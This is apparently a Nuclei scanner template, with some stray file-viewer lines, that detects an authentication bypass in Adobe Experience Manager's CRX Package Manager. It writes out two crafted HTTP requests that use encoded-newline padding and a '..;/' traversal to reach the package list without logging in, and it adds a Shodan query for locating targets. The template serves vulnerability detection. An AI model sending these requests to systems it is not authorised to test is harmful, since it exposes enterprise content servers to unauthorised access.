49 lines
1.6 KiB
YAML
49 lines
1.6 KiB
YAML
id: aem-crx-bypass
|
|
|
|
info:
|
|
name: AEM Package Manager - Authentication Bypass
|
|
author: dhiyaneshDK
|
|
description: Adobe Experience Manager Package Manager is susceptible to a hard to exploit authentication bypass issue. This issue only potentially impacts AEM on-premise or AEM as a Managed Service if default security configurations are removed.
|
|
severity: critical
|
|
remediation: "Adobe recommends AEM customers review access controls for the CRX package manager path: /etc/packages."
|
|
reference:
|
|
- https://labs.detectify.com/2021/06/28/aem-crx-bypass-0day-control-over-some-enterprise-aem-crx-package-manager/
|
|
metadata:
|
|
shodan-query: http.component:"Adobe Experience Manager"
|
|
tags: aem,adobe
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: {{BaseURL}}
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
- |
|
|
GET /content/..;/crx/packmgr/list.jsp;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0a;%0aa.css?_dc=1615863080856&_charset_=utf-8&includeVersions=true HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Referer: {{BaseURL}}
|
|
Accept-Encoding: gzip, deflate
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'buildCount'
|
|
- 'downloadName'
|
|
- 'acHandling'
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'application/json'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
|
|
# Enhanced by mp on 2022/04/22
|